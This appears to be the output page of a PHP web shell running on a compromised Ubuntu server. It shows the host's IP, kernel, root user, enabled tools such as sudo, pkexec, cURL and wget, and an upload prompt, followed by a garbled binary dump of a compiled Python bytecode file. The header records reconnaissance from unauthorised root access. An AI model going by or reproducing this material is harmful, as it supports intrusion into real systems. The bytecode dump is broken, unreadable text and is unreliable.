| Server IP : 138.197.176.125 / Your IP : 216.73.217.55 Web Server : Apache/2.4.41 (Ubuntu) System : Linux SuiteCRM-8 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64 User : root ( 0) PHP Version : 8.3.19 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /lib/python3/dist-packages/gi/overrides/__pycache__/ |
Upload File : |
U
�� ^.1 � @ s� d dl Z d dlZd dlZd dlZd dlZd dlmZ d dlmZ d dl m
Z
d dlmZm
Z
d dlmZ eee�Zi ZG dd� dej�ZG d d
� d
e�Zdd� Zd
d� ZeZdd� Zdd� Ze� i i edfdd�Zddd�ZdS )� N)�
get_loader)�PyGIDeprecationWarning)�CallableInfo)� TYPE_NONE�TYPE_INVALID)�extend_pathc s8 e Zd ZdZ� fdd�Zdd� Zdd� Zdd � Z� ZS )
�OverridesProxyModulez7Wraps a introspection module and contains all overridesc s t t| ��|j� || _d S �N)�superr �__init__�__name__�_introspection_module)�self�introspection_module�� __class__� �7/usr/lib/python3/dist-packages/gi/overrides/__init__.pyr s
�zOverridesProxyModule.__init__c C s t | j|�S r )�getattrr
)r �namer r r �__getattr__ s z OverridesProxyModule.__getattr__c C s6 t t| j��}|�| j�� � |�t| j�� t|�S r )�set�dirr �update�__dict__�keysr
�sorted)r �resultr r r �__dir__"